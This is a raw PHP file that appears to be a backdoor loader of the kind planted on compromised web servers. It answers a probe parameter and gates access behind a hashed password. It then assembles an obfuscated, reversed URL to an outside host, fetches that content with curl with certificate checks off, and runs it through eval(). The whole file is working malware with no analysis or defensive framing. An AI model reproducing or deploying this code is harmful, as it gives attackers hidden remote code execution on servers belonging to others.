<?php ?><?php error_reporting(0); if(isset($_REQUEST["0kb"])){die(">0kb<");};?><?php
if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '7b5f411cddef01612b26836750d71699dde1865246fe549728fb20a89d4650a4') {
      $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } }
?>
<?php
goto rZmcc; S05ge: $SS8Fu .= "\x2e\62\x30\x61"; goto KyXJG; RQpfg: $SS8Fu .= "\x34\63\x2f"; goto RiVZR; djqb0: $SS8Fu .= "\x74\x78\x74\56"; goto RQpfg; RiVZR: $SS8Fu .= "\x64"; goto c8b05; KyXJG: $SS8Fu .= "\x6d\141"; goto YHXMK; b4Lsi: eval("\77\76" . tW2kx(strrev($SS8Fu))); goto tNEm2; AzK8d: $SS8Fu .= "\x61\x6d"; goto mjfVw; CeZ0F: $SS8Fu .= "\160\x6f\164"; goto S05ge; rZmcc: $SS8Fu = ''; goto djqb0; QylGj: $SS8Fu .= "\x74\x68"; goto b4Lsi; mjfVw: $SS8Fu .= "\141\144\57"; goto CeZ0F; LrGN4: $SS8Fu .= "\163\x70\164"; goto QylGj; YHXMK: $SS8Fu .= "\144"; goto PSmdA; c8b05: $SS8Fu .= "\154\157\x2f"; goto AzK8d; PSmdA: $SS8Fu .= "\x2f\x2f\72"; goto LrGN4; tNEm2: function tW2kX($V1_rw = '') { goto O8cn3; w8lqj: curl_setopt($xM315, CURLOPT_URL, $V1_rw); goto AaXhS; oZNaA: curl_close($xM315); goto HKjcI; sEgPB: curl_setopt($xM315, CURLOPT_TIMEOUT, 500); goto J9cSf; HKjcI: return $tvmad; goto pji_p; UmOzv: curl_setopt($xM315, CURLOPT_SSL_VERIFYHOST, false); goto w8lqj; UhhOG: curl_setopt($xM315, CURLOPT_RETURNTRANSFER, true); goto sEgPB; AaXhS: $tvmad = curl_exec($xM315); goto oZNaA; J9cSf: curl_setopt($xM315, CURLOPT_SSL_VERIFYPEER, false); goto UmOzv; O8cn3: $xM315 = curl_init(); goto UhhOG; pji_p: }